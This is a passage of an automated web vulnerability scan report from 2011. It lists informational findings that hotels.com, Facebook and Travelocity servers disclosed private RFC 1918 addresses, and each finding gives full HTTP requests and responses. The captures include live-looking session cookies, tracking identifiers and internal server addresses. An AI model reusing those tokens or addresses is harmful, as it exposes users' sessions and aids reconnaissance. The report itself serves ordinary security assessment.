23.66. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; SSLB=1; user=RCoxODUuMC4wLmkxJTNBMTE0LjEuMCUzQTEyNC4xLjAuaTElM0ExMDMuNC4xLmk2JTNBMTcxLjEuMCUzQTEzMC4xLjEuaTIlM0E0OC4xLjAlM0E5Ny43My4xLmkzJTNBOTguNi40JTNBMTQyLjAuMC5pNCUzQTE5OC4yLjAlM0ExNDUuMC4wLmkyJTNBMjAwLjAuMCUzQTEzNy4wLjAuaTIlM0ExMDguMS4wLmkyJTNBMTkwLjMuMCUzQTE1Mi4wLjAuaTIlM0ExMzQuMC4xJTNBMTk2LjEuMCUzQTIuMi4xJTNBMjA5LjAuMSUzQTE0Ny42LjAuaTYlM0E5Mi4wLjAuaTElM0ExMjEuNTAzLjAuaTclM0ExMzIuMi4wLmkyJTNBMTIyLjEuMC5pMyUzQTEzOC4xLjAlM0ExNDkuMC4wLmkxJTNBMTA0LjAuMSUzQTE5NS4wLjAlN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:04:26 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe003:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 01:04:26 GMT
Pragma: no-cache
Content-Length: 1251
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE&tile=8e5da332-341e-45c6-9273-e47e77e107dc&ip=10.186.82.5 -->
...[SNIP]...
23.67. http://static.ak.connect.facebook.com/connect.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.facebook.com/extern/login_status.php?api_key=50c378d8154db3a16aee8f1a8bb76f49&extern=0&channel=http%3A%2F%2Fhublotnation.com%2F%3Fxd_receiver%3D1&locale=en_US&sdk=edgar
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS
If-None-Match: "c9db37e42d1614938a4a7574682e196c"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "e11cb49521860bcd18b4faec349d6327"
X-FB-Server: 10.32.94.126
X-Cnection: close
Content-Length: 18454
Vary: Accept-Encoding
Cache-Control: public, max-age=1044
Expires: Mon, 03 Oct 2011 00:18:32 GMT
Date: Mon, 03 Oct 2011 00:01:08 GMT
Connection: close

/*1317445939,169893502,JIT Construction: v451912,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
23.68. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS
If-None-Match: "0c369d4899210be922f0cf403cdf1976"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "ff1bc4a4dd923189e80d0e2def62a56c"
X-FB-Server: 10.32.170.119
X-Cnection: close
Content-Length: 211338
Vary: Accept-Encoding
Cache-Control: public, max-age=999
Expires: Mon, 03 Oct 2011 00:17:39 GMT
Date: Mon, 03 Oct 2011 00:01:00 GMT
Connection: close

/*1317447404,169912951,JIT Construction: v451912,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
23.69. http://static.ak.connect.facebook.com/images/connect_sprite.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /images/connect_sprite.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/connect_sprite.png HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
X-FB-Server: 10.33.10.108
X-Cnection: close
Content-Length: 1916
Cache-Control: max-age=70119
Expires: Mon, 03 Oct 2011 19:32:15 GMT
Date: Mon, 03 Oct 2011 00:03:36 GMT
Connection: close

.PNG
.
...IHDR...'.........b_Ci....PLTE...Oj.r..y..z...5nEa.z.....{..|........ay.......F_...................{..m........D^....@Z.B[....E^.C].......@Z.p..Le....p...........C].B\.............A[.......
...[SNIP]...
23.70. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "e11cb49521860bcd18b4faec349d6327"
X-FB-Server: 10.32.103.127
X-Cnection: close
Content-Length: 18454
Vary: Accept-Encoding
Cache-Control: public, max-age=437
Expires: Mon, 03 Oct 2011 02:00:09 GMT
Date: Mon, 03 Oct 2011 01:52:52 GMT
Connection: close

/*1317446434,169895807,JIT Construction: v451912,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
23.71. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4 HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "e11cb49521860bcd18b4faec349d6327"
X-FB-Server: 10.32.161.113
X-Cnection: close
Content-Length: 18454
Vary: Accept-Encoding
Cache-Control: public, max-age=874
Expires: Mon, 03 Oct 2011 00:16:28 GMT
Date: Mon, 03 Oct 2011 00:01:54 GMT
Connection: close

/*1317593643,169910641,JIT Construction: v451912,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
23.72. http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/XdCommReceiver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/XdCommReceiver.js HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/xd_receiver.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
X-FB-Server: 10.32.195.104
X-Cnection: close
Content-Length: 3386
Cache-Control: max-age=76458
Expires: Mon, 03 Oct 2011 23:07:44 GMT
Date: Mon, 03 Oct 2011 01:53:26 GMT
Connection: close
Vary: Accept-Encoding

/**
* NOTE - this file should be editted at
* /lib/connect/Facebook/XdComm/XdCommReceiver.js
* which will rewrite any library file connect is autogened
*
* @provides XdCommReceiver
* @requi
...[SNIP]...
23.73. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /js/api_lib/v0.4/XdCommReceiver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/XdCommReceiver.js HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://hublotnation.com/?xd_receiver=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
X-FB-Server: 10.30.145.198
X-Cnection: close
Content-Length: 3386
Vary: Accept-Encoding
Cache-Control: max-age=1996474
Expires: Wed, 26 Oct 2011 02:35:47 GMT
Date: Mon, 03 Oct 2011 00:01:13 GMT
Connection: close

/**
* NOTE - this file should be editted at
* /lib/connect/Facebook/XdComm/XdCommReceiver.js
* which will rewrite any library file connect is autogened
*
* @provides XdCommReceiver
* @requi
...[SNIP]...
23.74. http://static.ak.fbcdn.net/connect.php/js/FB.Share  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect.php/js/FB.Share

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/js/FB.Share HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "b5cf019c25115e9007f05a784bdf583c"

Response

HTTP/1.1 200 OK
ETag: "f73915a1c9a56247298577922a325cbc"
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=utf-8
X-FB-Server: 10.54.212.35
X-Cnection: close
Content-Length: 6585
Cache-Control: public, max-age=1121
Expires: Mon, 03 Oct 2011 00:08:14 GMT
Date: Sun, 02 Oct 2011 23:49:33 GMT
Connection: close

/*1317445880,171365411,JIT Construction: v451912,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
23.75. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1fc75419c%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ffcc6369f4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.148.190
X-Cnection: close
Content-Length: 2481
Vary: Accept-Encoding
Cache-Control: public, max-age=57651
Expires: Mon, 03 Oct 2011 16:08:16 GMT
Date: Mon, 03 Oct 2011 00:07:25 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...
23.76. http://travelocity.tt.omtrdc.net/m2/travelocity/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travelocity.tt.omtrdc.net
Path:   /m2/travelocity/mbox/standard

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /m2/travelocity/mbox/standard?mboxHost=www.travelocity.com&mboxSession=1317600481056-80236&mboxPage=1317600481056-80236&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxCount=1&ServiceTag=TRAVELOCITY&mbox=HMP&mboxId=0&mboxTime=1317582481071&mboxURL=http%3A%2F%2Fwww.travelocity.com%2F&mboxReferrer=http%3A%2F%2Fwww.travelocity.com%2Fresolve%2Fdefault&mboxVersion=39 HTTP/1.1
Host: travelocity.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 2713
Date: Mon, 03 Oct 2011 00:08:04 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('HMP',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-HMP-0">');mb
...[SNIP]...
}\r\n\r\n\/* if((location.href.indexOf(\'dev.sabre.com\') != -1) ||\r\n (location.href.indexOf(\'localhost\') != -1) ||\r\n (location.href.indexOf(\'file:\/\/\') != -1) ||\r\n (location.href.indexOf(\'10.19.84.47\') != -1) ||\r\n (location.href.indexOf(\'cert.travelocity.com\') != -1) ||\r\n (location.href.indexOf(\'tcysnc\') != -1)){\r\n var hosttype=\"cert\";\r\n }else{ var hosttype=\"travel\";}\r\n*\/\r\
...[SNIP]...
23.77. http://www.facebook.com/dialog/oauth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /dialog/oauth

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /dialog/oauth?api_key=162729813767876&app_id=162729813767876&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c878248c%26origin%3Dhttp%253A%252F%252Fwww.tripadvisor.com%252Ff7888e4cc%26relation%3Dparent.parent%26transport%3Dpostmessage&client_id=162729813767876&display=none&locale=en_US&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd0b050c4%26origin%3Dhttp%253A%252F%252Fwww.tripadvisor.com%252Ff7888e4cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df375be5bb8&response_type=token%2Csigned_request%2Ccode&sdk=joey HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=3#cb=fd0b050c4&origin=http%3A%2F%2Fwww.tripadvisor.com%2Ff7888e4cc&relation=parent&transport=postmessage&frame=f375be5bb8&error=unknown_user
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.94.127
X-Cnection: close
Date: Mon, 03 Oct 2011 00:40:14 GMT
Content-Length: 0

23.78. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=158327657537972&app_id=158327657537972&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e0e142%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1614ac084%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1089edae8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd74f8a6%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1089edae8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31b76cd44%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1089edae8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df222c04f5c%26origin%3Dhttp%253A%252F%252Fwww.hotels.com%252Ff2f34f73a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1089edae8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.177.62
X-Cnection: close
Date: Mon, 03 Oct 2011 00:28:23 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
23.79. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=50c378d8154db3a16aee8f1a8bb76f49&extern=2&channel=http%3A%2F%2Fhublotnation.com%2F%3Fxd_receiver%3D1&locale=en_US&sdk=edgar HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.154.31
X-Cnection: close
Date: Mon, 03 Oct 2011 00:03:36 GMT
Content-Length: 1159

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"hublotnation.com","channel"
...[SNIP]...
23.80. http://www.facebook.com/extern/login_status.php  previous  next

Summary

